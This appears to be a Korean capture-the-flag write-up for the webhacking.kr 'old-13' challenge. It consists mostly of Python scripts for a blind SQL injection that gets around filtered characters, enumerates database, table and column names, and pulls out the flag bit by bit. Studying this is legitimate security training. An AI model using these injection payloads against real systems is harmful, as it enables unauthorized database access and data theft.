#️⃣

OLD-13

때려박으란다
필터링 : | = %20 like group * 0x char WHERE
0 넣어보자 → 아무 일도 안생김
1 넣어보면 결과가 나오긴 한다. 이걸 참값으로 하고, 나머지를 거짓 값으로 해서 쿼리를 날려야겠다.
이제 DB 길이를 찾아야 하는데, = like 가 필터링 당하니까, in 을 활용했다.
def length_finder(search_max): for i in range(1,search_max): print("LOOKING FOR LENGTH : "+str(i)) #find db name length pay = "?no=(0)or((length(database()))in("+str(i)+"))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: print("PASSWORD LENGTH : "+str(i)) return i elif false in res.text: print("--> false") continue elif "hack" in res.text: print("filtered") else: print(res.text)
Python
이제 값을 찾아주면
def word_finder(length): flag = "" for i in range(1,length+1): word ="" print("FINDING PW of : "+str(i)) for j in range(1,9): print("SEARCHING for "+str(j),end="\r") pay = "?no=(0)or((substr(lpad(bin(ord(substr(database(),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: word +="1" continue elif false in res.text: word +="0" continue else: print("\nSOMETHING's WRONG") print("\n",res.text) exit() print("\n","word : "+chr(int("0b"+word,2))) flag += chr(int("0b"+word,2)) print("\n",flag)
Python
이정도면 뭐 양식이 정해져 있는거 같은 모습이다.
근데 공백 못쓰니까 쿼리가 너무 복잡해져서 실수가 많이 나온다.
def length_finder(search_max): for i in range(10,search_max): print("LOOKING FOR LENGTH : "+str(i)) #find db name length pay = "?no=LENGTH((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)))IN("+str(i)+")" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: print("PASSWORD LENGTH : "+str(i)) return i elif false in res.text: print("--> false") continue elif "hack" in res.text: print("filtered") else: print(res.text) exit() print("LENGTH NOT FOUND") exit() def word_finder(length): flag = "" for i in range(1,length+1): word ="" print("FINDING PW of : "+str(i)) for j in range(1,9): print("SEARCHING for "+str(j),end="\r") pay = "?no=(0)or((substr(lpad(bin(ord(substr((SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN(DATABASE())),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES)),"+str(i)+",1))),8,0),"+str(j)+",1))in(1))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: word +="1" continue elif false in res.text: word +="0" continue else: print("\nSOMETHING's WRONG") print("\n",res.text) exit() print("\n","word : "+chr(int("0b"+word,2))) flag += chr(int("0b"+word,2)) print("\n","STRING VALUE : "+flag)
Python
암튼 뭐 설명은 여기까지 똑같은거 반복이다.
전체 자동화 코드 넣어놨다.
import requests import os os.system("cls") print("------------AUTO EXPLOIT------------") URL = "https://webhacking.kr/challenge/web-10/" cookie = {"PHPSESSID": "<--REDACTED-->"} true= "result</td></tr><tr><td>1</td>" false ="result</td></tr><tr><td>0</td>" DBNAME_query = "database()" TABLENAME_query = "(SELECT(MIN(IF((SELECT(TABLE_SCHEMA)IN("+DBNAME_query+")),TABLE_NAME,NULL)))FROM(INFORMATION_SCHEMA.TABLES))" COLUMNNAME_query = "(SELECT(MIN(IF((SELECT(TABLE_NAME)IN("+TABLENAME_query+")),COLUMN_NAME,NULL)))FROM(INFORMATION_SCHEMA.COLUMNS))" DATA_query = "(SELECT(MIN(flag_3a55b31d))FROM(flag_ab733768))" def length_finder(search_max,query): for i in range(1,search_max): print("LOOKING FOR LENGTH : "+str(i)) #find db name length pay = "?no=LENGTH("+query+")IN("+str(i)+")" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: print("PASSWORD LENGTH : "+str(i)) return i elif false in res.text: print("--> false") continue elif "hack" in res.text: print("filtered") else: print(res.text) exit() print("LENGTH NOT FOUND") exit() def word_finder(length,query): flag = "" for i in range(1,length+1): word ="" print("FINDING PW of : "+str(i)) for j in range(1,9): print("SEARCHING for "+str(j),end="\r") pay = "?no=(0)or((substr(lpad(bin(ord(substr("+query+","+str(i)+",1))),8,0),"+str(j)+",1))in(1))" res = requests.get(url=URL+pay,cookies=cookie) if true in res.text: word +="1" continue elif false in res.text: word +="0" continue else: print("\nSOMETHING's WRONG") print("\n",res.text) exit() print("\n","word : "+chr(int("0b"+word,2))) flag += chr(int("0b"+word,2)) print("\n","STRING VALUE : "+flag) if __name__ == "__main__": #word_finder(length_finder(20,DBNAME_query),DBNAME_query) #word_finder(length_finder(20,TABLENAME_query),TABLENAME_query) #word_finder(length_finder(20,COLUMNNAME_query),COLUMNNAME_query) word_finder(length_finder(30,DATA_query),DATA_query)
Python